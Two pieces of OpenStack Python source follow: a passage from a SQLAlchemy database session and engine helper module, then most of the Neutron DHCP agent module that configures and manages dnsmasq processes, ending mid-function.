help='interval between retries of opening a sql connection'),
cfg.IntOpt('max_overflow',
default=None,
deprecated_opts=[cfg.DeprecatedOpt('sql_max_overflow',
group='DEFAULT'),
cfg.DeprecatedOpt('sqlalchemy_max_overflow',
group='DATABASE')],
help='If set, use this value for max_overflow with sqlalchemy'),
cfg.IntOpt('connection_debug',
default=0,
deprecated_opts=[cfg.DeprecatedOpt('sql_connection_debug',
group='DEFAULT')],
help='Verbosity of SQL debugging information. 0=None, '
'100=Everything'),
cfg.BoolOpt('connection_trace',
default=False,
deprecated_opts=[cfg.DeprecatedOpt('sql_connection_trace',
group='DEFAULT')],
help='Add python stack traces to SQL as comment strings'),
cfg.IntOpt('pool_timeout',
default=None,
deprecated_opts=[cfg.DeprecatedOpt('sqlalchemy_pool_timeout',
group='DATABASE')],
help='If set, use this value for pool_timeout with sqlalchemy'),
]
CONF = cfg.CONF
CONF.register_opts(sqlite_db_opts)
CONF.register_opts(database_opts, 'database')
LOG = logging.getLogger(__name__)
_ENGINE = None
_MAKER = None
_SLAVE_ENGINE = None
_SLAVE_MAKER = None
def set_defaults(sql_connection, sqlite_db, max_pool_size=None,
max_overflow=None, pool_timeout=None):
"""Set defaults for configuration variables."""
cfg.set_defaults(database_opts,
connection=sql_connection)
cfg.set_defaults(sqlite_db_opts,
sqlite_db=sqlite_db)
# Update the QueuePool defaults
if max_pool_size is not None:
cfg.set_defaults(database_opts,
max_pool_size=max_pool_size)
if max_overflow is not None:
cfg.set_defaults(database_opts,
max_overflow=max_overflow)
if pool_timeout is not None:
cfg.set_defaults(database_opts,
pool_timeout=pool_timeout)
def cleanup():
global _ENGINE, _MAKER
global _SLAVE_ENGINE, _SLAVE_MAKER
if _MAKER:
_MAKER.close_all()
_MAKER = None
if _ENGINE:
_ENGINE.dispose()
_ENGINE = None
if _SLAVE_MAKER:
_SLAVE_MAKER.close_all()
_SLAVE_MAKER = None
if _SLAVE_ENGINE:
_SLAVE_ENGINE.dispose()
_SLAVE_ENGINE = None
class SqliteForeignKeysListener(PoolListener):
"""Ensures that the foreign key constraints are enforced in SQLite.
The foreign key constraints are disabled by default in SQLite,
so the foreign key constraints will be enabled here for every
database connection
"""
def connect(self, dbapi_con, con_record):
dbapi_con.execute('pragma foreign_keys=ON')
def get_session(autocommit=True, expire_on_commit=False, sqlite_fk=False,
slave_session=False, mysql_traditional_mode=False):
"""Return a SQLAlchemy session."""
global _MAKER
global _SLAVE_MAKER
maker = _MAKER
if slave_session:
maker = _SLAVE_MAKER
if maker is None:
engine = get_engine(sqlite_fk=sqlite_fk, slave_engine=slave_session,
mysql_traditional_mode=mysql_traditional_mode)
maker = get_maker(engine, autocommit, expire_on_commit)
if slave_session:
_SLAVE_MAKER = maker
else:
_MAKER = maker
session = maker()
return session
# note(boris-42): In current versions of DB backends unique constraint
# violation messages follow the structure:
#
# sqlite:
# 1 column - (IntegrityError) column c1 is not unique
# N columns - (IntegrityError) column c1, c2, ..., N are not unique
#
# sqlite since 3.7.16:
# 1 column - (IntegrityError) UNIQUE constraint failed: k1
#
# N columns - (IntegrityError) UNIQUE constraint failed: k1, k2
#
# postgres:
# 1 column - (IntegrityError) duplicate key value violates unique
# constraint "users_c1_key"
# N columns - (IntegrityError) duplicate key value violates unique
# constraint "name_of_our_constraint"
#
# mysql:
# 1 column - (IntegrityError) (1062, "Duplicate entry 'value_of_c1' for key
# 'c1'")
# N columns - (IntegrityError) (1062, "Duplicate entry 'values joined
# with -' for key 'name_of_our_constraint'")
_DUP_KEY_RE_DB = {
"sqlite": (re.compile(r"^.*columns?([^)]+)(is|are)\s+not\s+unique$"),
re.compile(r"^.*UNIQUE\s+constraint\s+failed:\s+(.+)$")),
"postgresql": (re.compile(r"^.*duplicate\s+key.*\"([^\"]+)\"\s*\n.*$"),),
"mysql": (re.compile(r"^.*\(1062,.*'([^\']+)'\"\)$"),)
}
def _raise_if_duplicate_entry_error(integrity_error, engine_name):
"""Raise exception if two entries are duplicated.
In this function will be raised DBDuplicateEntry exception if integrity
error wrap unique constraint violation.
"""
def get_columns_from_uniq_cons_or_name(columns):
# note(vsergeyev): UniqueConstraint name convention: "uniq_t0c10c2"
# where `t` it is table name and columns `c1`, `c2`
# are in UniqueConstraint.
uniqbase = "uniq_"
if not columns.startswith(uniqbase):
if engine_name == "postgresql":
return [columns[columns.index("_") + 1:columns.rindex("_")]]
return [columns]
return columns[len(uniqbase):].split("0")[1:]
if engine_name not in ["mysql", "sqlite", "postgresql"]:
return
# FIXME(johannes): The usage of the .message attribute has been
# deprecated since Python 2.6. However, the exceptions raised by
# SQLAlchemy can differ when using unicode() and accessing .message.
# An audit across all three supported engines will be necessary to
# ensure there are no regressions.
for pattern in _DUP_KEY_RE_DB[engine_name]:
match = pattern.match(integrity_error.message)
if match:
break
else:
return
columns = match.group(1)
if engine_name == "sqlite":
columns = columns.strip().split(", ")
else:
columns = get_columns_from_uniq_cons_or_name(columns)
raise exception.DBDuplicateEntry(columns, integrity_error)
# NOTE(comstud): In current versions of DB backends, Deadlock violation
# messages follow the structure:
#
# mysql:
# (OperationalError) (1213, 'Deadlock found when trying to get lock; try '
# 'restarting transaction') <query_str> <query_args>
_DEADLOCK_RE_DB = {
"mysql": re.compile(r"^.*\(1213, 'Deadlock.*")
}
def _raise_if_deadlock_error(operational_error, engine_name):
"""Raise exception on deadlock condition.
Raise DBDeadlock exception if OperationalError contains a Deadlock
condition.
"""
re = _DEADLOCK_RE_DB.get(engine_name)
if re is None:
return
# FIXME(johannes): The usage of the .message attribute has been
# deprecated since Python 2.6. However, the exceptions raised by
# SQLAlchemy can differ when using unicode() and accessing .message.
# An audit across all three supported engines will be necessary to
# ensure there are no regressions.
m = re.match(operational_error.message)
if not m:
return
raise exception.DBDeadlock(operational_error)
def _wrap_db_error(f):
@functools.wraps(f)
def _wrap(*args, **kwargs):
try:
return f(*args, **kwargs)
except UnicodeEncodeError:
raise exception.DBInvalidUnicodeParameter()
# note(boris-42): We should catch unique constraint violation and
# wrap it by our own DBDuplicateEntry exception. Unique constraint
# violation is wrapped by IntegrityError.
except sqla_exc.OperationalError as e:
_raise_if_deadlock_error(e, get_engine().name)
# NOTE(comstud): A lot of code is checking for OperationalError
# so let's not wrap it for now.
raise
except sqla_exc.IntegrityError as e:
# note(boris-42): SqlAlchemy doesn't unify errors from different
# DBs so we must do this. Also in some tables (for example
# instance_types) there are more than one unique constraint. This
# means we should get names of columns, which values violate
# unique constraint, from error message.
_raise_if_duplicate_entry_error(e, get_engine().name)
raise exception.DBError(e)
except Exception as e:
LOG.exception(_('DB exception wrapped.'))
raise exception.DBError(e)
return _wrap
def get_engine(sqlite_fk=False, slave_engine=False,
mysql_traditional_mode=False):
"""Return a SQLAlchemy engine."""
global _ENGINE
global _SLAVE_ENGINE
engine = _ENGINE
db_uri = CONF.database.connection
if slave_engine:
engine = _SLAVE_ENGINE
db_uri = CONF.database.slave_connection
if engine is None:
engine = create_engine(db_uri, sqlite_fk=sqlite_fk,
mysql_traditional_mode=mysql_traditional_mode)
if slave_engine:
_SLAVE_ENGINE = engine
else:
_ENGINE = engine
return engine
def _synchronous_switch_listener(dbapi_conn, connection_rec):
"""Switch sqlite connections to non-synchronous mode."""
dbapi_conn.execute("PRAGMA synchronous = OFF")
def _add_regexp_listener(dbapi_con, con_record):
"""Add REGEXP function to sqlite connections."""
def regexp(expr, item):
reg = re.compile(expr)
return reg.search(six.text_type(item)) is not None
dbapi_con.create_function('regexp', 2, regexp)
def _thread_yield(dbapi_con, con_record):
"""Ensure other greenthreads get a chance to be executed.
If we use eventlet.monkey_patch(), eventlet.greenthread.sleep(0) will
execute instead of time.sleep(0).
Force a context switch. With common database backends (eg MySQLdb and
sqlite), there is no implicit yield caused by network I/O since they are
implemented by C libraries that eventlet cannot monkey patch.
"""
time.sleep(0)
def _ping_listener(engine, dbapi_conn, connection_rec, connection_proxy):
"""Ensures that MySQL and DB2 connections are alive.
Borrowed from:
http://groups.google.com/group/sqlalchemy/msg/a4ce563d802c929f
"""
cursor = dbapi_conn.cursor()
try:
ping_sql = 'select 1'
if engine.name == 'ibm_db_sa':
# DB2 requires a table expression
ping_sql = 'select 1 from (values (1)) AS t1'
cursor.execute(ping_sql)
except Exception as ex:
if engine.dialect.is_disconnect(ex, dbapi_conn, cursor):
msg = _('Database server has gone away: %s') % ex
LOG.warning(msg)
raise sqla_exc.DisconnectionError(msg)
else:
raise
def _set_mode_traditional(dbapi_con, connection_rec, connection_proxy):
"""Set engine mode to 'traditional'.
Required to prevent silent truncates at insert or update operations
under MySQL. By default MySQL truncates inserted string if it longer
than a declared field just with warning. That is fraught with data
corruption.
"""
dbapi_con.cursor().execute("SET SESSION sql_mode = TRADITIONAL;")
def _is_db_connection_error(args):
"""Return True if error in connecting to db."""
# NOTE(adam_g): This is currently MySQL specific and needs to be extended
# to support Postgres and others.
# For the db2, the error code is -30081 since the db2 is still not ready
conn_err_codes = ('2002', '2003', '2006', '-30081')
for err_code in conn_err_codes:
if args.find(err_code) != -1:
return True
return False
def create_engine(sql_connection, sqlite_fk=False,
mysql_traditional_mode=False):
"""Return a new SQLAlchemy engine."""
# NOTE(geekinutah): At this point we could be connecting to the normal
# db handle or the slave db handle. Things like
# _wrap_db_error aren't going to work well if their
# backends don't match. Let's check.
_assert_matching_drivers()
connection_dict = sqlalchemy.engine.url.make_url(sql_connection)
engine_args = {
"pool_recycle": CONF.database.idle_timeout,
"echo": False,
'convert_unicode': True,
}
# Map our SQL debug level to SQLAlchemy's options
if CONF.database.connection_debug >= 100:
engine_args['echo'] = 'debug'
elif CONF.database.connection_debug >= 50:
engine_args['echo'] = True
if "sqlite" in connection_dict.drivername:
if sqlite_fk:
engine_args["listeners"] = [SqliteForeignKeysListener()]
engine_args["poolclass"] = NullPool
if CONF.database.connection == "sqlite://":
engine_args["poolclass"] = StaticPool
engine_args["connect_args"] = {'check_same_thread': False}
else:
if CONF.database.max_pool_size is not None:
engine_args['pool_size'] = CONF.database.max_pool_size
if CONF.database.max_overflow is not None:
engine_args['max_overflow'] = CONF.database.max_overflow
if CONF.database.pool_timeout is not None:
engine_args['pool_timeout'] = CONF.database.pool_timeout
engine = sqlalchemy.create_engine(sql_connection, **engine_args)
sqlalchemy.event.listen(engine, 'checkin', _thread_yield)
if engine.name in ['mysql', 'ibm_db_sa']:
callback = functools.partial(_ping_listener, engine)
sqlalchemy.event.listen(engine, 'checkout', callback)
if mysql_traditional_mode:
sqlalchemy.event.listen(engine, 'checkout', _set_mode_traditional)
else:
LOG.warning(_("This application has not enabled MySQL traditional"
" mode, which means silent data corruption may"
" occur. Please encourage the application"
" developers to enable this mode."))
elif 'sqlite' in connection_dict.drivername:
if not CONF.sqlite_synchronous:
sqlalchemy.event.listen(engine, 'connect',
_synchronous_switch_listener)
sqlalchemy.event.listen(engine, 'connect', _add_regexp_listener)
if (CONF.database.connection_trace and
engine.dialect.dbapi.__name__ == 'MySQLdb'):
_patch_mysqldb_with_stacktrace_comments()
try:
engine.connect()
except sqla_exc.OperationalError as e:
if not _is_db_connection_error(e.args[0]):
raise
remaining = CONF.database.max_retries
if remaining == -1:
remaining = 'infinite'
while True:
msg = _('SQL connection failed. %s attempts left.')
LOG.warning(msg % remaining)
if remaining != 'infinite':
remaining -= 1
time.sleep(CONF.database.retry_interval)
try:
engine.connect()
break
except sqla_exc.OperationalError as e:
if (remaining != 'infinite' and remaining == 0) or \
not _is_db_connection_error(e.args[0]):
raise
return engine
class Query(sqlalchemy.orm.query.Query):
"""Subclass of sqlalchemy.query with soft_delete() method."""
def soft_delete(self, synchronize_session='evaluate'):
return self.update({'deleted': literal_column('id'),
'updated_at': literal_column('updated_at'),
'deleted_at': timeutils.utcnow()},
synchronize_session=synchronize_session)
class Session(sqlalchemy.orm.session.Session):
"""Custom Session class to avoid SqlAlchemy Session monkey patching."""
@_wrap_db_error
def query(self, *args, **kwargs):
return super(Session, self).query(*args, **kwargs)
@_wrap_db_error
def flush(self, *args, **kwargs):
return super(Session, self).flush(*args, **kwargs)
@_wrap_db_error
def execute(self, *args, **kwargs):
return super(Session, self).execute(*args, **kwargs)
def get_maker(engine, autocommit=True, expire_on_commit=False):
"""Return a SQLAlchemy sessionmaker using the given engine."""
return sqlalchemy.orm.sessionmaker(bind=engine,
class_=Session,
autocommit=autocommit,
expire_on_commit=expire_on_commit,
query_cls=Query)
def _patch_mysqldb_with_stacktrace_comments():
"""Adds current stack trace as a comment in queries.
Patches MySQLdb.cursors.BaseCursor._do_query.
"""
import MySQLdb.cursors
import traceback
old_mysql_do_query = MySQLdb.cursors.BaseCursor._do_query
def _do_query(self, q):
stack = ''
for filename, line, method, function in traceback.extract_stack():
# exclude various common things from trace
if filename.endswith('session.py') and method == '_do_query':
continue
if filename.endswith('api.py') and method == 'wrapper':
continue
if filename.endswith('utils.py') and method == '_inner':
continue
if filename.endswith('exception.py') and method == '_wrap':
continue
# db/api is just a wrapper around db/sqlalchemy/api
if filename.endswith('db/api.py'):
continue
# only trace inside keystone
index = filename.rfind('keystone')
if index == -1:
continue
stack += "File:%s:%s Method:%s() Line:%s | " \
% (filename[index:], line, method, function)
# strip trailing " | " from stack
if stack:
stack = stack[:-3]
qq = "%s /* %s */" % (q, stack)
else:
qq = q
old_mysql_do_query(self, qq)
setattr(MySQLdb.cursors.BaseCursor, '_do_query', _do_query)
def _assert_matching_drivers():
"""Make sure slave handle and normal handle have the same driver."""
# NOTE(geekinutah): There's no use case for writing to one backend and
# reading from another. Who knows what the future holds?
if CONF.database.slave_connection == '':
return
normal = sqlalchemy.engine.url.make_url(CONF.database.connection)
slave = sqlalchemy.engine.url.make_url(CONF.database.slave_connection)
assert normal.drivername == slave.drivername
| |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
import collections
import os
import re
import shutil
import socket
import sys
import uuid
import netaddr
from oslo.config import cfg
import six
from neutron.agent.linux import ip_lib
from neutron.agent.linux import utils
from neutron.common import constants
from neutron.common import exceptions
from neutron.openstack.common import importutils
from neutron.openstack.common import jsonutils
from neutron.openstack.common import log as logging
from neutron.openstack.common import uuidutils
LOG = logging.getLogger(__name__)
OPTS = [
cfg.StrOpt('dhcp_confs',
default='$state_path/dhcp',
help=_('Location to store DHCP server config files')),
cfg.StrOpt('dhcp_domain',
default='openstacklocal',
help=_('Domain to use for building the hostnames')),
cfg.StrOpt('dnsmasq_config_file',
default='',
help=_('Override the default dnsmasq settings with this file')),
cfg.ListOpt('dnsmasq_dns_servers',
help=_('Comma-separated list of the DNS servers which will be '
'used as forwarders.'),
deprecated_name='dnsmasq_dns_server'),
cfg.BoolOpt('dhcp_delete_namespaces', default=False,
help=_("Delete namespace after removing a dhcp server.")),
cfg.IntOpt(
'dnsmasq_lease_max',
default=(2 ** 24),
help=_('Limit number of leases to prevent a denial-of-service.')),
]
IPV4 = 4
IPV6 = 6
UDP = 'udp'
TCP = 'tcp'
DNS_PORT = 53
DHCPV4_PORT = 67
DHCPV6_PORT = 547
METADATA_DEFAULT_PREFIX = 16
METADATA_DEFAULT_IP = '169.254.169.254'
METADATA_DEFAULT_CIDR = '%s/%d' % (METADATA_DEFAULT_IP,
METADATA_DEFAULT_PREFIX)
METADATA_PORT = 80
WIN2k3_STATIC_DNS = 249
NS_PREFIX = 'qdhcp-'
class DictModel(object):
"""Convert dict into an object that provides attribute access to values."""
def __init__(self, d):
for key, value in d.iteritems():
if isinstance(value, list):
value = [DictModel(item) if isinstance(item, dict) else item
for item in value]
elif isinstance(value, dict):
value = DictModel(value)
setattr(self, key, value)
class NetModel(DictModel):
def __init__(self, use_namespaces, d):
super(NetModel, self).__init__(d)
self._ns_name = (use_namespaces and
"%s%s" % (NS_PREFIX, self.id) or None)
@property
def namespace(self):
return self._ns_name
@six.add_metaclass(abc.ABCMeta)
class DhcpBase(object):
def __init__(self, conf, network, root_helper='sudo',
version=None, plugin=None):
self.conf = conf
self.network = network
self.root_helper = root_helper
self.device_manager = DeviceManager(self.conf,
self.root_helper, plugin)
self.version = version
@abc.abstractmethod
def enable(self):
"""Enables DHCP for this network."""
@abc.abstractmethod
def disable(self, retain_port=False):
"""Disable dhcp for this network."""
def restart(self):
"""Restart the dhcp service for the network."""
self.disable(retain_port=True)
self.enable()
self.device_manager.update(self.network)
@abc.abstractproperty
def active(self):
"""Boolean representing the running state of the DHCP server."""
@abc.abstractmethod
def reload_allocations(self):
"""Force the DHCP server to reload the assignment database."""
@classmethod
def existing_dhcp_networks(cls, conf, root_helper):
"""Return a list of existing networks ids that we have configs for."""
raise NotImplementedError
@classmethod
def check_version(cls):
"""Execute version checks on DHCP server."""
raise NotImplementedError
class DhcpLocalProcess(DhcpBase):
PORTS = []
def _enable_dhcp(self):
"""check if there is a subnet within the network with dhcp enabled."""
for subnet in self.network.subnets:
if subnet.enable_dhcp:
return True
return False
def enable(self):
"""Enables DHCP for this network by spawning a local process."""
interface_name = self.device_manager.setup(self.network,
reuse_existing=True)
if self.active:
self.restart()
elif self._enable_dhcp():
self.interface_name = interface_name
self.spawn_process()
def disable(self, retain_port=False):
"""Disable DHCP for this network by killing the local process."""
pid = self.pid
if self.active:
cmd = ['kill', '-9', pid]
utils.execute(cmd, self.root_helper)
if not retain_port:
self.device_manager.destroy(self.network, self.interface_name)
elif pid:
LOG.debug(_('DHCP for %(net_id)s pid %(pid)d is stale, ignoring '
'command'), {'net_id': self.network.id, 'pid': pid})
else:
LOG.debug(_('No DHCP started for %s'), self.network.id)
self._remove_config_files()
if not retain_port:
if self.conf.dhcp_delete_namespaces and self.network.namespace:
ns_ip = ip_lib.IPWrapper(self.root_helper,
self.network.namespace)
try:
ns_ip.netns.delete(self.network.namespace)
except RuntimeError:
msg = _('Failed trying to delete namespace: %s')
LOG.exception(msg, self.network.namespace)
def _remove_config_files(self):
confs_dir = os.path.abspath(os.path.normpath(self.conf.dhcp_confs))
conf_dir = os.path.join(confs_dir, self.network.id)
shutil.rmtree(conf_dir, ignore_errors=True)
def get_conf_file_name(self, kind, ensure_conf_dir=False):
"""Returns the file name for a given kind of config file."""
confs_dir = os.path.abspath(os.path.normpath(self.conf.dhcp_confs))
conf_dir = os.path.join(confs_dir, self.network.id)
if ensure_conf_dir:
if not os.path.isdir(conf_dir):
os.makedirs(conf_dir, 0o755)
return os.path.join(conf_dir, kind)
def _get_value_from_conf_file(self, kind, converter=None):
"""A helper function to read a value from one of the state files."""
file_name = self.get_conf_file_name(kind)
msg = _('Error while reading %s')
try:
with open(file_name, 'r') as f:
try:
return converter and converter(f.read()) or f.read()
except ValueError:
msg = _('Unable to convert value in %s')
except IOError:
msg = _('Unable to access %s')
LOG.debug(msg % file_name)
return None
@property
def pid(self):
"""Last known pid for the DHCP process spawned for this network."""
return self._get_value_from_conf_file('pid', int)
@property
def active(self):
pid = self.pid
if pid is None:
return False
cmdline = '/proc/%s/cmdline' % pid
try:
with open(cmdline, "r") as f:
return self.network.id in f.readline()
except IOError:
return False
@property
def interface_name(self):
return self._get_value_from_conf_file('interface')
@interface_name.setter
def interface_name(self, value):
interface_file_path = self.get_conf_file_name('interface',
ensure_conf_dir=True)
utils.replace_file(interface_file_path, value)
@abc.abstractmethod
def spawn_process(self):
pass
class Dnsmasq(DhcpLocalProcess):
# The ports that need to be opened when security policies are active
# on the Neutron port used for DHCP. These are provided as a convenience
# for users of this class.
PORTS = {IPV4: [(UDP, DNS_PORT), (TCP, DNS_PORT), (UDP, DHCPV4_PORT)],
IPV6: [(UDP, DNS_PORT), (TCP, DNS_PORT), (UDP, DHCPV6_PORT)],
}
_TAG_PREFIX = 'tag%d'
NEUTRON_NETWORK_ID_KEY = 'NEUTRON_NETWORK_ID'
NEUTRON_RELAY_SOCKET_PATH_KEY = 'NEUTRON_RELAY_SOCKET_PATH'
MINIMUM_VERSION = 2.59
@classmethod
def check_version(cls):
ver = 0
try:
cmd = ['dnsmasq', '--version']
out = utils.execute(cmd)
ver = re.findall("\d+.\d+", out)[0]
is_valid_version = float(ver) >= cls.MINIMUM_VERSION
if not is_valid_version:
LOG.warning(_('FAILED VERSION REQUIREMENT FOR DNSMASQ. '
'DHCP AGENT MAY NOT RUN CORRECTLY! '
'Please ensure that its version is %s '
'or above!'), cls.MINIMUM_VERSION)
except (OSError, RuntimeError, IndexError, ValueError):
LOG.warning(_('Unable to determine dnsmasq version. '
'Please ensure that its version is %s '
'or above!'), cls.MINIMUM_VERSION)
return float(ver)
@classmethod
def existing_dhcp_networks(cls, conf, root_helper):
"""Return a list of existing networks ids that we have configs for."""
confs_dir = os.path.abspath(os.path.normpath(conf.dhcp_confs))
return [
c for c in os.listdir(confs_dir)
if uuidutils.is_uuid_like(c)
]
def spawn_process(self):
"""Spawns a Dnsmasq process for the network."""
env = {
self.NEUTRON_NETWORK_ID_KEY: self.network.id,
}
cmd = [
'dnsmasq',
'--no-hosts',
'--no-resolv',
'--strict-order',
'--bind-interfaces',
'--interface=%s' % self.interface_name,
'--except-interface=lo',
'--pid-file=%s' % self.get_conf_file_name(
'pid', ensure_conf_dir=True),
'--dhcp-hostsfile=%s' % self._output_hosts_file(),
'--dhcp-optsfile=%s' % self._output_opts_file(),
'--leasefile-ro',
]
possible_leases = 0
for i, subnet in enumerate(self.network.subnets):
# if a subnet is specified to have dhcp disabled
if not subnet.enable_dhcp:
continue
if subnet.ip_version == 4:
mode = 'static'
else:
# TODO(mark): how do we indicate other options
# ra-only, slaac, ra-nameservers, and ra-stateless.
mode = 'static'
if self.version >= self.MINIMUM_VERSION:
set_tag = 'set:'
else:
set_tag = ''
cidr = netaddr.IPNetwork(subnet.cidr)
cmd.append('--dhcp-range=%s%s,%s,%s,%ss' %
(set_tag, self._TAG_PREFIX % i,
cidr.network,
mode,
self.conf.dhcp_lease_duration))
possible_leases += cidr.size
# Cap the limit because creating lots of subnets can inflate
# this possible lease cap.
cmd.append('--dhcp-lease-max=%d' %
min(possible_leases, self.conf.dnsmasq_lease_max))
cmd.append('--conf-file=%s' % self.conf.dnsmasq_config_file)
if self.conf.dnsmasq_dns_servers:
cmd.extend(
'--server=%s' % server
for server in self.conf.dnsmasq_dns_servers)
if self.conf.dhcp_domain:
cmd.append('--domain=%s' % self.conf.dhcp_domain)
ip_wrapper = ip_lib.IPWrapper(self.root_helper,
self.network.namespace)
ip_wrapper.netns.execute(cmd, addl_env=env)
def _release_lease(self, mac_address, ip):
"""Release a DHCP lease."""
cmd = ['dhcp_release', self.interface_name, ip, mac_address]
ip_wrapper = ip_lib.IPWrapper(self.root_helper,
self.network.namespace)
ip_wrapper.netns.execute(cmd)
def reload_allocations(self):
"""Rebuild the dnsmasq config and signal the dnsmasq to reload."""
# If all subnets turn off dhcp, kill the process.
if not self._enable_dhcp():
self.disable()
LOG.debug(_('Killing dhcpmasq for network since all subnets have '
'turned off DHCP: %s'), self.network.id)
return
self._release_unused_leases()
self._output_hosts_file()
self._output_opts_file()
if self.active:
cmd = ['kill', '-HUP', self.pid]
utils.execute(cmd, self.root_helper)
else:
LOG.debug(_('Pid %d is stale, relaunching dnsmasq'), self.pid)
LOG.debug(_('Reloading allocations for network: %s'), self.network.id)
self.device_manager.update(self.network)
def _output_hosts_file(self):
"""Writes a dnsmasq compatible hosts file."""
r = re.compile('[:.]')
buf = six.StringIO()
filename = self.get_conf_file_name('host')
LOG.debug(_('Building host file: %s'), filename)
for port in self.network.ports:
for alloc in port.fixed_ips:
name = 'host-%s.%s' % (r.sub('-', alloc.ip_address),
self.conf.dhcp_domain)
set_tag = ''
# (dzyu) Check if it is legal ipv6 address, if so, need wrap
# it with '[]' to let dnsmasq to distinguish MAC address from
# IPv6 address.
ip_address = alloc.ip_address
if netaddr.valid_ipv6(ip_address):
ip_address = '[%s]' % ip_address
LOG.debug(_('Adding %(mac)s : %(name)s : %(ip)s'),
{"mac": port.mac_address, "name": name,
"ip": ip_address})
if getattr(port, 'extra_dhcp_opts', False):
if self.version >= self.MINIMUM_VERSION:
set_tag = 'set:'
buf.write('%s,%s,%s,%s%s\n' %
(port.mac_address, name, ip_address,
set_tag, port.id))
else:
buf.write('%s,%s,%s\n' %
(port.mac_address, name, ip_address))
utils.replace_file(filename, buf.getvalue())
LOG.debug(_('Done building host file %s'), filename)
return filename
def _read_hosts_file_leases(self, filename):
leases = set()
if os.path.exists(filename):
with open(filename) as f:
for l in f.readlines():
host = l.strip().split(',')
leases.add((host[2], host[0]))
return leases
def _release_unused_leases(self):
filename = self.get_conf_file_name('host')
old_leases = self._read_hosts_file_leases(filename)
new_leases = set()
for port in self.network.ports:
for alloc in port.fixed_ips:
new_leases.add((alloc.ip_address, port.mac_address))
for ip, mac in old_leases - new_leases:
self._release_lease(mac, ip)
def _output_opts_file(self):
"""Write a dnsmasq compatible options file."""
if self.conf.enable_isolated_metadata:
subnet_to_interface_ip = self._make_subnet_interface_ip_map()
options = []
dhcp_ips = collections.defaultdict(list)
subnet_idx_map = {}
for i, subnet in enumerate(self.network.subnets):
if not subnet.enable_dhcp:
continue
if subnet.dns_nameservers:
options.append(
self._format_option(i, 'dns-server',
','.join(subnet.dns_nameservers)))
else:
# use the dnsmasq ip as nameservers only if there is no
# dns-server submitted by the server
subnet_idx_map[subnet.id] = i
gateway = subnet.gateway_ip
host_routes = []
for hr in subnet.host_routes:
if hr.destination == "0.0.0.0/0":
gateway = hr.nexthop
else:
host_routes.append("%s,%s" % (hr.destination, hr.nexthop))
# Add host routes for isolated network segments
if self._enable_metadata(subnet):
subnet_dhcp_ip = subnet_to_interface_ip[subnet.id]
host_routes.append(
'%s/32,%s' % (METADATA_DEFAULT_IP, subnet_dhcp_ip)
)
if host_routes:
options.append(
self._format_option(i, 'classless-static-route',
','.join(host_routes)))
options.append(
self._format_option(i, WIN2k3_STATIC_DNS,
','.join(host_routes)))
if subnet.ip_version == 4:
if gateway:
options.append(self._format_option(i, 'router', gateway))
else:
options.append(self._format_option(i, 'router'))
for port in self.network.ports:
if getattr(port, 'extra_dhcp_opts', False):
options.extend(
self._format_option(port.id, opt.opt_name, opt.opt_value)
for opt in port.extra_dhcp_opts)
# provides all dnsmasq ip as dns-server if there is more than
# one dnsmasq for a subnet and there is no dns-server submitted
# by the server
if port.device_owner == constants.DEVICE_OWNER_DHCP:
for ip in port.fixed_ips:
i = subnet_idx_map.get(ip.subnet_id)
if i is None:
continue
dhcp_ips[i].append(ip.ip_address)
for i, ips in dhcp_ips.items():
if len(ips) > 1:
options.append(self._format_option(i,
'dns-server',
','.join(ips)))
name = self.get_conf_file_name('opts')
utils.replace_file(name, '\n'.join(options))
return name
def _make_subnet_interface_ip_map(self):
ip_dev = ip_lib.IPDevice(
self.interface_name,
self.root_helper,
self.network.namespace
)
subnet_lookup = dict(
(netaddr.IPNetwork(subnet.cidr), subnet.id)
for subnet in self.network.subnets
)
retval = {}
for addr in ip_dev.addr.list():
ip_net = netaddr.IPNetwork(addr['cidr'])
if ip_net in subnet_lookup:
retval[subnet_lookup[ip_net]] = addr['cidr'].split('/')[0]
return retval
def _format_option(self, tag, option, *args):
"""Format DHCP option by option name or code."""
if self.version >= self.MINIMUM_VERSION:
set_tag = 'tag:'
else:
set_tag = ''
option = str(option)
if isinstance(tag, int):
tag = self._TAG_PREFIX % tag
if not option.isdigit():
option = 'option:%s' % option
return ','.join((set_tag + tag, '%s' % option) + args)
def _enable_metadata(self, subnet):
'''Determine if the metadata route will be pushed to hosts on subnet.
If subnet has a Neutron router attached, we want the hosts to get
metadata from the router's proxy via their default route instead.
'''
if self.conf.enable_isolated_metadata and subnet.ip_version == 4:
if subnet.gateway_ip is None:
return True
else:
for port in self.network.ports:
if port.device_owner == constants.DEVICE_OWNER_ROUTER_INTF:
for alloc in port.fixed_ips:
if alloc.subnet_id == subnet.id:
return False
return True
else:
return False
@classmethod
def lease_update(cls):
network_id = os.environ.get(cls.NEUTRON_NETWORK_ID_KEY)
dhcp_relay_socket = os.environ.get(cls.NEUTRON_RELAY_SOCKET_PATH_KEY)
action = sys.argv[1]
if action not in ('add', 'del', 'old'):
sys.exit()
mac_address = sys.argv[2]
ip_address = sys.argv[3]
if action == 'del':
lease_remaining = 0
else:
lease_remaining = int(os.environ.get('DNSMASQ_TIME_REMAINING', 0))
data = dict(network_id=network_id, mac_address=mac_address,
ip_address=ip_address, lease_remaining=lease_remaining)
if os.path.exists(dhcp_relay_socket):
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.connect(dhcp_relay_socket)
sock.send(jsonutils.dumps(data))
sock.close()
class DeviceManager(object):
def __init__(self, conf, root_helper, plugin):
self.conf = conf
self.root_helper = root_helper
self.plugin = plugin
if not conf.interface_driver:
msg = _('An interface driver must be specified')
LOG.error(msg)
raise SystemExit(msg)
try:
self.driver = importutils.import_object(
conf.interface_driver, conf)
except Exception as e:
msg = (_("Error importing interface driver '%(driver)s': "
"%(inner)s") % {'driver': conf.interface_driver,
'inner': e})
LOG.error(msg)
raise SystemExit(msg)
def get_interface_name(self, network, port):
"""Return interface(device) name for use by the DHCP process."""
return self.driver.get_device_name(port)
def get_device_id(self, network):
"""Return a unique DHCP device ID for this host on the network."""
# There could be more than one dhcp server per network, so create
# a device id that combines host and network ids
host_uuid = uuid.uuid5(uuid.NAMESPACE_DNS, socket.gethostname())
